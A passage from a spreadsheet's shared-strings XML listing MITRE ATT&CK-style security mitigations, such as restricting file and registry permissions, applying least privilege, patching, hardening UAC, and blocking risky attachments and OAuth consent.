    <t xml:space="preserve">Ensure proper process and file permissions are in place to prevent adversaries from disabling or interfering with logging or deleting or modifying .evtx logging files. Ensure .evtx files, which are located at &lt;code&gt;C:\Windows\system32\Winevt\Logs&lt;/code&gt;(Citation: win_xml_evt_log), have the proper file permissions for limited, legitimate access and audit policies for detection. </t>
  </si>
  <si>
    <t>Ensure proper process and file permissions are in place to prevent adversaries from disabling or modifying firewall settings.</t>
  </si>
  <si>
    <t>Ensure proper process and file permissions are in place to prevent adversaries from disabling or interfering with security services.</t>
  </si>
  <si>
    <t>Set directory access controls to prevent file writes to the search paths for applications, both in the folders where applications are run from and the standard dylib folders.</t>
  </si>
  <si>
    <t>Applying more restrictive permissions to files and directories could prevent adversaries from modifying their access control lists. Additionally, ensure that user settings regarding local and remote symbolic links are properly set or disabled where unneeded.(Citation: create_sym_links)</t>
  </si>
  <si>
    <t>Install software in write-protected locations. Set directory access controls to prevent file writes to the search paths for applications, both in the folders where applications are run from and the standard library folders.</t>
  </si>
  <si>
    <t>Ensure proper process and file permissions are in place to prevent adversaries from disabling or interfering with security/logging services.</t>
  </si>
  <si>
    <t>Ensure event tracers/forwarders (Citation: Microsoft ETW May 2018), firewall policies, and other associated mechanisms are secured with appropriate permissions and access controls.</t>
  </si>
  <si>
    <t>Set group policies to restrict file permissions to the &lt;code&gt;~/launchagents&lt;/code&gt; folder.(Citation: piazza launch agent mitigation)</t>
  </si>
  <si>
    <t>Applying more restrictive permissions to files and directories could prevent adversaries from modifying the access control lists.</t>
  </si>
  <si>
    <t>Use file system access controls to protect folders such as C:\\Windows\\System32.</t>
  </si>
  <si>
    <t>Use file system access controls to protect folders such as C:\Windows\System32.</t>
  </si>
  <si>
    <t>Restrict write access to the `/Library/Security/SecurityAgentPlugins` directory.</t>
  </si>
  <si>
    <t>Consider adjusting read and write permissions for NTFS EA, though this should be tested to ensure routine OS operations are not impeded. (Citation: InsiderThreat NTFS EA Oct 2017)</t>
  </si>
  <si>
    <t>Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory &lt;code&gt;C:&lt;/code&gt; and system directories, such as &lt;code&gt;C:\Windows\&lt;/code&gt;, to reduce places where malicious files could be placed for execution. Require that all executables be placed in write-protected directories.</t>
  </si>
  <si>
    <t>Making PowerShell profiles immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.</t>
  </si>
  <si>
    <t>Ensure permissions are properly set on folders containing sensitive private keys to prevent unintended access.</t>
  </si>
  <si>
    <t xml:space="preserve">Restrict the permissions on sensitive files such as &lt;code&gt;/proc/[pid]/maps&lt;/code&gt; or &lt;code&gt;/proc/[pid]/mem&lt;/code&gt;. </t>
  </si>
  <si>
    <t>Limit privileges of user accounts so only authorized users can edit the rc.common file.</t>
  </si>
  <si>
    <t>Prevent critical business and system processes from being replaced, overwritten, or reconfigured to load potentially malicious code.</t>
  </si>
  <si>
    <t>Restrict storage and execution of SIP DLLs to protected directories, such as C:\\Windows, rather than user directories.</t>
  </si>
  <si>
    <t>Restrict access to the &lt;code&gt;authorized_keys&lt;/code&gt; file.</t>
  </si>
  <si>
    <t>Ensure proper file permissions are set and harden system to prevent root privilege escalation opportunities.</t>
  </si>
  <si>
    <t>Ensure that high permission level service binaries cannot be replaced or modified by users with a lower permission level.</t>
  </si>
  <si>
    <t>Ensure proper process and file permissions are in place to inhibit adversaries from disabling or interfering with critical services.</t>
  </si>
  <si>
    <t>Since StartupItems are deprecated, preventing all users from writing to the &lt;code&gt;/Library/StartupItems&lt;/code&gt; directory would prevent any startup items from getting registered.</t>
  </si>
  <si>
    <t>Restrict read/write access to systemd unit files to only select privileged users who have a legitimate need to manage system services.</t>
  </si>
  <si>
    <t>Restrict read/write access to systemd &lt;code&gt;.timer&lt;/code&gt; unit files to only select privileged users who have a legitimate need to manage system services.</t>
  </si>
  <si>
    <t>Protect shared folders by minimizing users who have write access.</t>
  </si>
  <si>
    <t>Consider using Group Policy to configure and block additions/modifications to W32Time DLLs. (Citation: Microsoft W32Time May 2017)</t>
  </si>
  <si>
    <t>Making these files immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.</t>
  </si>
  <si>
    <t>Restrict write access to XDG autostart entries to only select privileged users.</t>
  </si>
  <si>
    <t>Disallow loading of remote DLLs. This is included by default in Windows Server 2012+ and is available by patch for XP+ and Server 2003+.
Enable Safe DLL Search Mode to force search for system DLLs in directories with greater restrictions (e.g. &lt;code&gt;%SYSTEMROOT%&lt;/code&gt;)to be used before local directory DLLs (e.g. a user's home directory)
The Safe DLL Search Mode can be enabled via Group Policy at Computer Configuration &gt; [Policies] &gt; Administrative Templates &gt; MSS (Legacy): MSS: (SafeDllSearchMode) Enable Safe DLL search mode. The associated Windows Registry key for this is located at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDLLSearchMode&lt;/code&gt;(Citation: Microsoft More information about DLL)(Citation: Microsoft Dynamic Link Library Search Order)</t>
  </si>
  <si>
    <t>Ensure safe DLL search mode is enabled &lt;code&gt;HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\SafeDllSearchMode&lt;/code&gt; to mitigate risk that lsass.exe loads a malicious code library. (Citation: Microsoft DLL Security)</t>
  </si>
  <si>
    <t>Ensure proper permissions are set for Registry hives to prevent users from modifying keys for logon scripts that may lead to persistence.</t>
  </si>
  <si>
    <t>Ensure proper permissions are set for Registry hives to prevent users from modifying keys associated with COR_PROFILER.</t>
  </si>
  <si>
    <t>Protect generated event files and logs that are stored locally with proper permissions and authentication and limit opportunities for adversaries to increase privileges by preventing Privilege Escalation opportunities.</t>
  </si>
  <si>
    <t>Ensure proper permissions are set for the Registry to prevent users from modifying keys related to code signing policies.</t>
  </si>
  <si>
    <t>Ensure proper Registry permissions are in place to prevent adversaries from disabling or interfering logging. The addition of the MiniNT registry key disables Event Viewer.(Citation: def_ev_win_event_logging)</t>
  </si>
  <si>
    <t>Ensure proper Registry permissions are in place to prevent adversaries from disabling or modifying firewall settings.</t>
  </si>
  <si>
    <t>Ensure proper Registry permissions are in place to prevent adversaries from disabling or interfering with security services.</t>
  </si>
  <si>
    <t>Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.</t>
  </si>
  <si>
    <t>Ensure proper Registry permissions are in place to prevent adversaries from disabling or interfering with security/logging services.</t>
  </si>
  <si>
    <t xml:space="preserve">Ensure proper permissions are set for Registry hives to prevent users from modifying keys related to SIP and trust provider components. Components may still be able to be hijacked to suitable functions already present on disk if malicious modifications to Registry keys are not prevented. </t>
  </si>
  <si>
    <t>Consider using Group Policy to configure and block modifications to service and other critical server parameters in the Registry.(Citation: Microsoft System Services Fundamentals)</t>
  </si>
  <si>
    <t>Ensure proper registry permissions are in place to inhibit adversaries from disabling or interfering with critical services.</t>
  </si>
  <si>
    <t xml:space="preserve">Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation. </t>
  </si>
  <si>
    <t>Ensure proper permissions are set for Registry hives to prevent users from modifying keys related to SIP and trust provider components. Components may still be able to be hijacked to suitable functions already present on disk if malicious modifications to Registry keys are not prevented.</t>
  </si>
  <si>
    <t>Consider using Group Policy to configure and block modifications to Terminal Services parameters in the Registry.(Citation: Microsoft System Services Fundamentals)</t>
  </si>
  <si>
    <t>Consider using Group Policy to configure and block modifications to W32Time parameters in the Registry. (Citation: Microsoft W32Time May 2017)</t>
  </si>
  <si>
    <t>Update corporate policies to restrict what types of third-party applications may be added to any online service or tool that is linked to the company's information, accounts or network (e.g., Google, Microsoft, Dropbox, Basecamp, GitHub). However, rather than providing high-level guidance on this, be extremely specific—include a list of per-approved applications and deny all others not on the list. Administrators may also block end-user consent through administrative portals, such as the Azure Portal, disabling users from authorizing third-party apps through OAuth and forcing administrative consent.(Citation: Microsoft Azure AD Admin Consent)</t>
  </si>
  <si>
    <t>Web proxies can be used to enforce external network communication policy that prevents use of unauthorized external services.</t>
  </si>
  <si>
    <t>Script blocking extensions can help prevent the execution of scripts and HTA files that may commonly be used during the exploitation process. For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.</t>
  </si>
  <si>
    <t>Consider blocking download/transfer and execution of potentially uncommon file types known to be used in adversary campaigns, such as CHM files</t>
  </si>
  <si>
    <t>In some cases a local DNS sinkhole may be used to help prevent DGA-based command and control at a reduced cost.</t>
  </si>
  <si>
    <t>For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.
Script blocking extensions can help prevent the execution of JavaScript that may commonly be used during the exploitation process.</t>
  </si>
  <si>
    <t>In some cases a local DNS sinkhole may be used to help prevent behaviors associated with dynamic resolution.</t>
  </si>
  <si>
    <t>Web proxies can be used to enforce an external network communication policy that prevents use of unauthorized external services.</t>
  </si>
  <si>
    <t>Script blocking extensions can help prevent the execution of JavaScript and HTA files that may commonly be used during the exploitation process. For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.</t>
  </si>
  <si>
    <t>If a link is being visited by a user, block unknown or unused files in transit by default that should not be downloaded or by policy from suspicious sites as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. Some download scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious files.</t>
  </si>
  <si>
    <t>Determine if certain websites or attachment types (ex: .scr, .exe, .pif, .cpl, etc.) that can be used for phishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.</t>
  </si>
  <si>
    <t>Block unknown or unused attachments by default that should not be transmitted over email as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. Some email scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious attachments.</t>
  </si>
  <si>
    <t>Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.</t>
  </si>
  <si>
    <t>Determine if certain social media sites, personal webmail services, or other service that can be used for spearphishing is necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.</t>
  </si>
  <si>
    <t>Administrators can block end-user consent to OAuth applications, disabling users from authorizing third-party apps through OAuth 2.0 and forcing administrative consent for all requests. They can also block end-user registration of applications by their users, to reduce risk. A Cloud Access Security Broker can also be used to ban applications.
Azure offers a couple of enterprise policy settings in the Azure Management Portal that may help:
"Users -&gt; User settings -&gt; App registrations: Users can register applications" can be set to "no" to prevent users from registering new applications. 
"Enterprise applications -&gt; User settings -&gt; Enterprise applications: Users can consent to apps accessing company data on their behalf" can be set to "no" to prevent users from consenting to allow third-party multi-tenant applications</t>
  </si>
  <si>
    <t>SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols.</t>
  </si>
  <si>
    <t>If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be domain fronting.</t>
  </si>
  <si>
    <t>Allowlist MIB objects and implement SNMP views.(Citation: Cisco Securing SNMP)</t>
  </si>
  <si>
    <t>Consider disabling embedded files in Office programs, such as OneNote, that do not work with Protected View.(Citation: Enigma Reviving DDE Jan 2018)(Citation: GitHub Disable DDEAUTO Oct 2017)</t>
  </si>
  <si>
    <t>Configure browsers/applications to regularly delete persistent web credentials (such as cookies).</t>
  </si>
  <si>
    <t>Consider automatically relaunching forwarding mechanisms at recurring intervals (ex: temporal, on-logon, etc.) as well as applying appropriate change management to firewall rules and other related system configurations.</t>
  </si>
  <si>
    <t>HTTP Public Key Pinning (HPKP) is one method to mitigate potential [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) situations where and adversary uses a mis-issued or fraudulent certificate to intercept encrypted communications by enforcing use of an expected certificate. (Citation: Wikipedia HPKP)</t>
  </si>
  <si>
    <t xml:space="preserve">Allowlist MIB objects and implement SNMP views. Disable Smart Install (SMI) if not used.(Citation: Cisco Securing SNMP)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) </t>
  </si>
  <si>
    <t>For the Office Test method, create the Registry key used to execute it and set the permissions to "Read Control" to prevent easy access to the key without administrator permissions or requiring Privilege Escalation. (Citation: Palo Alto Office Test Sofacy)</t>
  </si>
  <si>
    <t>Create the Registry key used to execute it and set the permissions to "Read Control" to prevent easy access to the key without administrator permissions or requiring Privilege Escalation.(Citation: Palo Alto Office Test Sofacy)</t>
  </si>
  <si>
    <t>Consider re-locking password managers after a short timeout to limit the time plaintext credentials live in memory from decrypted databases.</t>
  </si>
  <si>
    <t>Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using SPF) and integrity of messages (using DKIM). Enabling these mechanisms within an organization (through policies such as DMARC) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)</t>
  </si>
  <si>
    <t>Avoid PowerShell profiles if not needed. Use the -No Profile flag with when executing PowerShell scripts remotely to prevent local profiles and scripts from being executed.</t>
  </si>
  <si>
    <t>Ensure that endpoint defenses run in safe mode.(Citation: CyberArk Labs Safe Mode 2016)</t>
  </si>
  <si>
    <t>Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using SPF) and integrity of messages (using DKIM). Enabling these mechanisms within an organization (through policies such as DMARC) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing).
Furthermore, policies may enforce / install browser extensions that protect against IDN and homograph attacks.</t>
  </si>
  <si>
    <t xml:space="preserve">Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using SPF) and integrity of messages (using DKIM). Enabling these mechanisms within an organization (through policies such as DMARC) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
Furthermore, policies may enforce / install browser extensions that protect against IDN and homograph attacks. Browser password managers may also be configured to only populate credential fields when the URL matches that of the original, legitimate site. </t>
  </si>
  <si>
    <t>Configure browsers or tasks to regularly delete persistent cookies.</t>
  </si>
  <si>
    <t>Cloud service providers may allow customers to deactivate unused regions.(Citation: CloudSploit - Unused AWS Regions)</t>
  </si>
  <si>
    <t>Configure browsers/applications to regularly delete persistent web cookies.</t>
  </si>
  <si>
    <t>Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization.</t>
  </si>
  <si>
    <t>Upgrade to Windows 8 or later and enable secure boot.</t>
  </si>
  <si>
    <t>Microsoft released an optional patch update - KB3045645 - that will remove the "auto-elevate" flag within the sdbinst.exe. This will prevent use of application shimming to bypass UAC.</t>
  </si>
  <si>
    <t xml:space="preserve">Ensure operating systems and browsers are using the most current version. </t>
  </si>
  <si>
    <t>Consider updating Windows to the latest version and patch level to utilize the latest protective measures against UAC bypass.(Citation: Github UACMe)</t>
  </si>
  <si>
    <t>Perform regular firmware updates to mitigate risks of exploitation and/or abuse.</t>
  </si>
  <si>
    <t>A patch management process should be implemented to check unused dependencies, unmaintained and/or previously vulnerable dependencies, unnecessary features, components, files, and documentation.</t>
  </si>
  <si>
    <t>A patch management process should be implemented to check unused applications, unmaintained and/or previously vulnerable software, unnecessary features, components, files, and documentation.</t>
  </si>
  <si>
    <t>Update software regularly to include patches that fix DLL side-loading vulnerabilities.</t>
  </si>
  <si>
    <t>Keep system images and software updated and migrate to SNMPv3.(Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>Ensure all browsers and plugins kept updated can help prevent the exploit phase of this technique. Use modern browsers with security features turned on.</t>
  </si>
  <si>
    <t>Update software regularly by employing patch management for externally exposed applications.</t>
  </si>
  <si>
    <t>Update software regularly by employing patch management for internal enterprise endpoints and servers.</t>
  </si>
  <si>
    <t>Patch the BIOS and other firmware as necessary to prevent successful use of known vulnerabilities.</t>
  </si>
  <si>
    <t>Apply patch KB2962486 which prevents credentials from being stored in GPPs.(Citation: ADSecurity Finding Passwords in SYSVOL)(Citation: MS14-025)</t>
  </si>
  <si>
    <t>For the Outlook methods, blocking macros may be ineffective as the Visual Basic engine used for these features is separate from the macro scripting engine.(Citation: SensePost Outlook Forms) Microsoft has released patches to try to address each issue. Ensure KB3191938 which blocks Outlook Visual Basic and displays a malicious code warning, KB4011091 which disables custom forms by default, and KB4011162 which removes the legacy Home Page feature, are applied to systems.(Citation: SensePost Outlook Home Page)</t>
  </si>
  <si>
    <t xml:space="preserve">Apply patch KB2871997 to Windows 7 and higher systems to limit the default access of accounts in the local administrator group.(Citation: NSA Spotting) </t>
  </si>
  <si>
    <t xml:space="preserve">Upgrade management services to the latest supported and compatible version.  Specifically, any version providing increased password complexity or policy enforcement preventing default or weak passwords. </t>
  </si>
  <si>
    <t>Update password managers regularly by employing patch management for internal enterprise endpoints and servers.</t>
  </si>
  <si>
    <t>Patch the BIOS and EFI as necessary.</t>
  </si>
  <si>
    <t>Patch deployment systems regularly to prevent potential remote access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).</t>
  </si>
  <si>
    <t>Although UAC bypass techniques exist, it is still prudent to use the highest enforcement level for UAC when possible and mitigate bypass opportunities that exist with techniques such as [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).</t>
  </si>
  <si>
    <t>Changing UAC settings to "Always Notify" will give the user more visibility when UAC elevation is requested, however, this option will not be popular among users due to the constant UAC interruptions.</t>
  </si>
  <si>
    <t>Turn off UAC's privilege elevation for standard users &lt;code&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]&lt;/code&gt; to automatically deny elevation requests, add: &lt;code&gt;"ConsentPromptBehaviorUser"=dword:00000000&lt;/code&gt;. Consider enabling installer detection for all users by adding: &lt;code&gt;"EnableInstallerDetection"=dword:00000001&lt;/code&gt;. This will prompt for a password for installation and also log the attempt. To disable installer detection, instead add: &lt;code&gt;"EnableInstallerDetection"=dword:00000000&lt;/code&gt;. This may prevent potential elevation of privileges through exploitation during the process of UAC detecting the installer, but will allow the installation process to continue without being logged.  (Citation: Executable Installers are Vulnerable)</t>
  </si>
  <si>
    <t>Enable pass the hash mitigations to apply UAC restrictions to local accounts on network logon. The associated Registry key is located &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy&lt;/code&gt;.
Through GPO: Computer Configuration &gt; [Policies] &gt; Administrative Templates &gt; SCM: Pass the Hash Mitigations: Apply UAC restrictions to local accounts on network logons.(Citation: GitHub IAD Secure Host Baseline UAC Filtering)</t>
  </si>
  <si>
    <t>Turn off UAC's privilege elevation for standard users &lt;code&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]&lt;/code&gt;to automatically deny elevation requests, add: &lt;code&gt;"ConsentPromptBehaviorUser"=dword:00000000&lt;/code&gt;. Consider enabling installer detection for all users by adding: &lt;code&gt;"EnableInstallerDetection"=dword:00000001&lt;/code&gt;. This will prompt for a password for installation and also log the attempt. To disable installer detection, instead add: &lt;code&gt;"EnableInstallerDetection"=dword:00000000&lt;/code&gt;. This may prevent potential elevation of privileges through exploitation during the process of UAC detecting the installer, but will allow the installation process to continue without being logged.(Citation: Executable Installers are Vulnerable)</t>
  </si>
  <si>
    <t xml:space="preserve">An adversary must already have administrator level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require.  </t>
  </si>
  <si>
    <t>Ensure that low-privileged user accounts do not have permissions to modify accounts or account-related policies.</t>
  </si>
  <si>
    <t>Ensure that low-privileged user accounts do not have permission to add access keys to accounts.</t>
  </si>
  <si>
    <t>Ensure that low-privileged user accounts do not have permissions to add permissions to accounts or update IAM policies.</t>
  </si>
  <si>
    <t>Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks on remote systems. In Linux environments, users account-level access to &lt;code&gt;[at](https://attack.mitre.org/software/S0110)&lt;/code&gt; can be managed using &lt;code&gt;at.allow&lt;/code&gt; and &lt;code&gt;at.deny&lt;/code&gt; files. Users listed in the at.allow are enabled to schedule actions using at, whereas users listed in at.deny file disabled from the utility.</t>
  </si>
  <si>
    <t xml:space="preserve">
Consider limiting access to the BITS interface to specific users or groups.(Citation: Symantec BITS May 2007)</t>
  </si>
  <si>
    <t>Since browser pivoting requires a high integrity process to launch from, restricting user permissions and addressing Privilege Escalation and [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) opportunities can limit the exposure to this technique.</t>
  </si>
  <si>
    <t>Proactively reset accounts that are known to be part of breached credentials either immediately, or after detecting bruteforce attempts.</t>
  </si>
  <si>
    <t>Limit the privileges of user accounts so that only authorized administrators can edit system environment variables.</t>
  </si>
  <si>
    <t>Limit permissions to discover cloud accounts in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.</t>
  </si>
  <si>
    <t>Periodically review user accounts and remove those that are inactive or unnecessary. Limit the ability for user accounts to create additional accounts.</t>
  </si>
  <si>
    <t>Limit permissions to discover cloud infrastructure in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.</t>
  </si>
  <si>
    <t>Enforce the principle of least-privilege by limiting dashboard visibility to only the resources required. This may limit the discovery value of the dashboard in the event of a compromised account.</t>
  </si>
  <si>
    <t>Restrict granting of permissions related to listing objects in cloud storage to necessary accounts.</t>
  </si>
  <si>
    <t>Enforce the principle of least-privilege. Consider implementing access control mechanisms that include both authentication and authorization for code repositories.</t>
  </si>
  <si>
    <t>Enforce the principle of least-privilege. Consider implementing access control mechanisms that include both authentication and authorization.</t>
  </si>
  <si>
    <t>Enforce authentication and role-based access control on the container API to restrict users to the least privileges required.(Citation: Kubernetes Hardening Guide)</t>
  </si>
  <si>
    <t>Enforce authentication and role-based access control on the container service to restrict users to the least privileges required.(Citation: Kubernetes Hardening Guide)</t>
  </si>
  <si>
    <t>Limit privileges of user accounts and remediate privilege escalation vectors so only authorized administrators can create container orchestration jobs.</t>
  </si>
  <si>
    <t>Enforce the principle of least privilege by limiting dashboard visibility to only the required users.</t>
  </si>
  <si>
    <t>Limit permissions for creating new instances in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>An adversary must already have administrator level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require.</t>
  </si>
  <si>
    <t>Limit permissions for creating snapshots or backups in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>Limit privileges of user accounts and groups so that only authorized administrators can interact with system-level process changes and service configurations.</t>
  </si>
  <si>
    <t>&lt;code&gt;cron&lt;/code&gt; permissions are controlled by &lt;code&gt;/etc/cron.allow and /etc/cron.deny&lt;/code&gt;. If there is a &lt;code&gt;cron.allow&lt;/code&gt; file, then the user or users that need to use &lt;code&gt;cron&lt;/code&gt; will need to be listed in the file. &lt;code&gt;cron.deny&lt;/code&gt; is used to explicitly disallow users from using cron. If neither files exist, then only the super user is allowed to run cron.</t>
  </si>
  <si>
    <t>Configure user permissions groups and roles for access to cloud storage.(Citation: Microsoft Azure Storage Security, 2019) Implement strict Identity and Access Management (IAM) controls to prevent access to storage solutions except for the applications, users, and services that require access.(Citation: Amazon S3 Security, 2019) Ensure that temporary access tokens are issued rather than permanent credentials, especially when access is being granted to entities outside of the internal security boundary.(Citation: Amazon  AWS Temporary Security Credentials)</t>
  </si>
  <si>
    <t>Limit permissions for deleting new instances in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>Enforce the principle of least privilege by limiting container dashboard access to only the necessary users.</t>
  </si>
  <si>
    <t>Configure default account policy to enable logging. Manage policies to ensure only necessary users have permissions to make changes to logging policies.</t>
  </si>
  <si>
    <t>Ensure proper user permissions are in place to prevent adversaries from disabling or interfering with logging.</t>
  </si>
  <si>
    <t>Ensure least privilege principles are applied to Identity and Access Management (IAM) security policies.(Citation: Expel IO Evil in AWS)</t>
  </si>
  <si>
    <t>Ensure proper user permissions are in place to prevent adversaries from disabling or modifying firewall settings.</t>
  </si>
  <si>
    <t>Ensure proper user permissions are in place to prevent adversaries from disabling or interfering with security services.</t>
  </si>
  <si>
    <t>Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.(Citation: Wald0 Guide to GPOs)(Citation: Microsoft WMI Filters)(Citation: Microsoft GPO Security Filtering)</t>
  </si>
  <si>
    <t>Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Deny execution from user directories such as file download directories and temp directories where able.</t>
  </si>
  <si>
    <t>Ensure that user accounts with administrative rights follow best practices, including use of privileged access workstations, Just in Time/Just Enough Administration (JIT/JEA), and strong authentication. Reduce the number of users that are members of highly privileged Directory Roles.(Citation: Microsoft SolarWinds Customer Guidance)</t>
  </si>
  <si>
    <t>Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Deny execution from user directories such as file download directories and temp directories where able.
Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory &lt;code&gt;C:&lt;/code&gt; and system directories, such as &lt;code&gt;C:\Windows\&lt;/code&gt;, to reduce places where malicious files could be placed for execution.</t>
  </si>
  <si>
    <t>Ensure proper user permissions are in place to prevent adversaries from disabling or interfering with security/logging services.</t>
  </si>
  <si>
    <t>Ensure event tracers/forwarders (Citation: Microsoft ETW May 2018), firewall policies, and other associated mechanisms are secured with appropriate permissions and access controls and cannot be manipulated by user accounts.</t>
  </si>
  <si>
    <t xml:space="preserve">Use MDM to disable user's ability to install or approve kernel extensions, and ensure all approved kernel extensions are in alignment with policies specified in &lt;code&gt;com.apple.syspolicy.kernel-extension-policy&lt;/code&gt;.(Citation: Apple TN2459 Kernel Extensions)(Citation: MDMProfileConfigMacOS)
</t>
  </si>
  <si>
    <t>Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new Launch Daemons.</t>
  </si>
  <si>
    <t>Prevent users from installing their own launch agents or launch daemons.</t>
  </si>
  <si>
    <t>Ensure that proper policies are implemented to dictate the the secure enrollment and deactivation of authentication mechanisms, such as MFA, for user accounts.</t>
  </si>
  <si>
    <t>Limit permissions for creating, deleting, and otherwise altering compute components in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>Ensure that proper policies are implemented to dictate the secure enrollment and deactivation of MFA for user accounts.</t>
  </si>
  <si>
    <t>Use of Authentication, Authorization, and Accounting (AAA) systems will limit actions users can perform and provide a history of user actions to detect unauthorized use and abuse. Ensure least privilege principles are applied to user accounts and groups so that only authorized users can perform configuration changes. (Citation: Cisco IOS Software Integrity Assurance - AAA)</t>
  </si>
  <si>
    <t>In cloud environments, ensure that users are not granted permissions to create or modify traffic mirrors unless this is explicitly required.</t>
  </si>
  <si>
    <t>Do not allow a domain user to be in the local administrator group on multiple systems.</t>
  </si>
  <si>
    <t>Do not allow a user to be a local administrator for multiple systems.</t>
  </si>
  <si>
    <t>Limit user accounts that can load or unload device drivers by disabling &lt;code&gt;SeLoadDriverPrivilege&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Limit remote user permissions if remote access is necessary.</t>
  </si>
  <si>
    <t>Limit the accounts that may use remote services. Limit the permissions for accounts that are at higher risk of compromise; for example, configure SSH so users can only run specific programs.</t>
  </si>
  <si>
    <t>Limit which user accounts are allowed to login via SSH.</t>
  </si>
  <si>
    <t>In cloud environments, ensure that only users who explicitly require the permissions to update instance metadata or configurations can do so.</t>
  </si>
  <si>
    <t xml:space="preserve">Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks on remote systems. </t>
  </si>
  <si>
    <t>Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks on remote systems.</t>
  </si>
  <si>
    <t>Enforce the principle of least privilege by limiting privileges of user accounts so only authorized accounts can modify and/or add server software components.(Citation: NSA and ASD Detect and Prevent Web Shells 2020)</t>
  </si>
  <si>
    <t>Remove permissions to create, modify, or run serverless resources from users that do not explicitly require them.</t>
  </si>
  <si>
    <t>Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations.</t>
  </si>
  <si>
    <t>Limit permissions for who can create symbolic links in Windows to appropriate groups such as Administrators and necessary groups for virtualization. This can be done through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Create symbolic links. (Citation: UCF STIG Symbolic Links)</t>
  </si>
  <si>
    <t>Ensure that any accounts used by third-party providers to access these systems are traceable to the third-party and are not used throughout the network or used by other third-party providers in the same environment. Ensure there are regular reviews of accounts provisioned to these systems to verify continued business need, and ensure there is governance to trace de-provisioning of access that is no longer required. Ensure proper system and access isolation for critical network systems through use of account privilege separation.</t>
  </si>
  <si>
    <t xml:space="preserve">Azure AD Administrators apply limitations upon the ability for users to grant consent to unfamiliar or unverified third-party applications. </t>
  </si>
  <si>
